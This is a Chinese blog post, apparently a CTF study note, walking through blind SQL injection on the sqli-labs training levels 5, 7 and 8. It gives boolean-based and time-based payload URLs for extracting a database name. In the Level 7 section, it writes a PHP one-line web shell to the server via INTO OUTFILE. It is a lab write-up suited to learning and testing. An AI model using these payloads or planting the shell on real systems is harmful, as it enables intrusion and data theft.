CTFweb篇-SQL注入(二)

最新推荐文章于 2024-07-04 18:58:13 发布
最新推荐文章于 2024-07-04 18:58:13 发布
阅读量257 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44597701/article/details/107985078
版权

盲注

基于布尔的盲注

基于布尔的盲注,就是传入注入的值,服务器那边只是返回True或者False

补充知识

left(a,b):提取a中从左往右前b个字符

select(database(),1)=‘s’:如果数据库名的第一个字符是s,则返回1

regxp:用于匹配

select user() regexp ‘r’:如果用户名前面是r,则返回1

like:跟regxp一样,只是字符串后面加%
substr(a,b,c):截取a字符串从b开始的前c个字符
ascii():返回某个字符的ascii码

SQL语句一点注意点

如果原句是

select * from table where id = ‘x’

这里x可以是1",1")等,大概原理跟上一篇的"x"情形一样,但是这里不能是 x’

Less5

如果传入的SQL语句执行正确,就会显示You are in …
这里可以利用left函数来确定相关信息,例如数据库名字

http://192.168.1.2/sqli-labs-master/Less-5/?id=1’ and left(database(),1)=‘s’–%20

在这里插入图片描述
证明当前数据库名的第一个字符是s
再用:

http://192.168.1.2/sqli-labs-master/Less-5/?id=1’ and left(database(),2)=‘se’–%20

仍然正常返回,证明前两个字符是se
由此往下推算下去,在这里可以用burp suite的暴力破解来达到目的。
!!!注意
当把上面的database打错成databas或者其它错误函数时,虽然会出错,但是他会直接打印出在这里插入图片描述
直接能从报错中看出数据库名是security

Less7

传入

http://192.168.1.2/sqli-labs-master/Less-7/?id=%E2%80%99

报错,就有注入漏洞 !!!在双引号中写入注释符是无用的。
传入id=1,提示要写出文件
再传入

http://192.168.1.2/sqli-labs-master/Less-7/?id=1%27))%20order%20by%204–%20

提示语法错误,order by3就是正确的,证明有三个字段
下面开始文件注入
select ’ ’ into outfile ‘文件路径’
查看导出文件权限show variables like '%secure%'
如果遇到权限报错,就需要再mysql的my.ini中去添加权限
下面用payload:

http://192.168.1.2/sqli-labs-master/Less-7/?id=-1’)) union select 1,2,"<?php eval($_POST['pass']);?>" into outfile “E:\web\PHPstudy\phpstudy_pro\WWW\sqli-labs-master\Less-7\one.php” --%20

就写入了一句话木马,用中国菜刀连接即可。

Less8

传入
http://127.0.0.1/sqli-labs-master/Less-8/?id=1
正常显示
在这里插入图片描述
传入id=1",id=1"),id=1’也是正常显示
但是当传入id=1’时
在这里插入图片描述
什么都没有显示,可以得到ID是双单引号闭合。

可以通过以下方法来获取信息
通常可以用length(database())=N:通过此函数来判断数据库的长度
substr(database(),1,1)=X:通过这个来判断数据库第一个字符
ascii(substr(database(),1,1)=N:通过N的数字来判断数据库名的第一个字符的ascii

传入

http://127.0.0.1/sqli-labs-master/Less-8/?id=1‘ and length(database()) = 8 --%20

在这里插入图片描述
当将8改为9

http://127.0.0.1/sqli-labs-master/Less-8/?id=1‘ and length(database()) = 9 --%20

在这里插入图片描述
什么都没有显示
由此证明当前数据库名是8个字符组成

基于时间的盲注

Less8

首先判断出存在注入漏洞
然后利用

http://192.168.1.2/sqli-labs-master/Less-8/?id=1’ and if(length(database())=8,1,sleep(2))–+

用sleep函数来判断数据库信息,这里判断出了数据库名的长度是8
利用

http://192.168.1.2/sqli-labs-master/Less-8/?id=1’ and if (ascii(substr(database(),1,1)) = 115,1,sleep(3))–+

来判断数据库名,这里证明数据库名的第一位是ASCII为115
以此类推下去即可。

weixin_44597701
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 409
文章目录前言一、题目描述题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTFWebSQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1448
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
CTF 小白教程《从0到1:CTFer成长之路》SQL - 2 题过程
在下小黄的博客
06-07 2449
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: 小白教程《从0到1:CTFer成长之路》结题过程 《从0到1:CTFer成长之路》书籍配套题目,点击即可打开 - 实验环境(i 春秋 需要登录) 微信公众号回复:【CTF】,即可获取本文全部涉及到的工具。 创建时间:2021年5月30日 软件: MindMaster Pro、kali 这里写目录标题CTF
CTF常用sql注入)报错注入(普通以及双查询)
最新发布
2301_81040377的博客
07-04 794
适用于页面无正常回显,但是有报错,那么就可以使用报错注入
sql注入(CTF技巧)
黑日里不灭的light
03-14 640
释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
CTF-web部分 SQL注入(2)
iamsongyu的博客
10-08 653
sql注入 sql三大法宝 mid(),substr(),left() mid截断函数–》MID(column_name,start[,length]) 前两个必须 最后可选 substr()函数–》 Substr()和substring()函数实现的功能是一样的,均为截取字符串。 (string, start, length) 从1开始的 Left()函数–》得到字符串左部指定个数的字符 L...
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 410
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
CTF学习笔记——sql注入(2)
Obs_cure的博客
08-16 558
一、[SUCTF 2019]EasySQL 看标题就知道是关于sql注入的题目。老规矩,先跑一下sqlmap,再用1’ or 1=1 #试试。 全部木大了…看writeup吧…
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
1. **SQL注入**:参赛者需要了如何利用不安全的SQL查询来获取敏感信息,以及如何防御这类攻击,如参数化查询、输入验证和使用预编译语句。 2. **XSS(Cross Site Scripting)**:试题可能包含对XSS漏洞的利用,如...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
SQL注入漏洞演示源代码
07-15
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段...
BUUCTF[第一章 web入门]SQL注入-2
hivjianxian的博客
11-22 519
ctf
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细析)
weixin_66146598的博客
06-09 5120
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4360
ctfshow 靶场 web入门 sql注入系列
CTF-Web SQL注入
weixin_52182264的博客
04-26 4286
sql注入基本情况了 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
BUUCTF web SQL注入
m0_55854679的博客
08-09 2866
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
CTFHub技能树 Web-SQL注入
千寻的博客
11-21 2027
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入析以及常用指令的操作。首先,我们来了一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值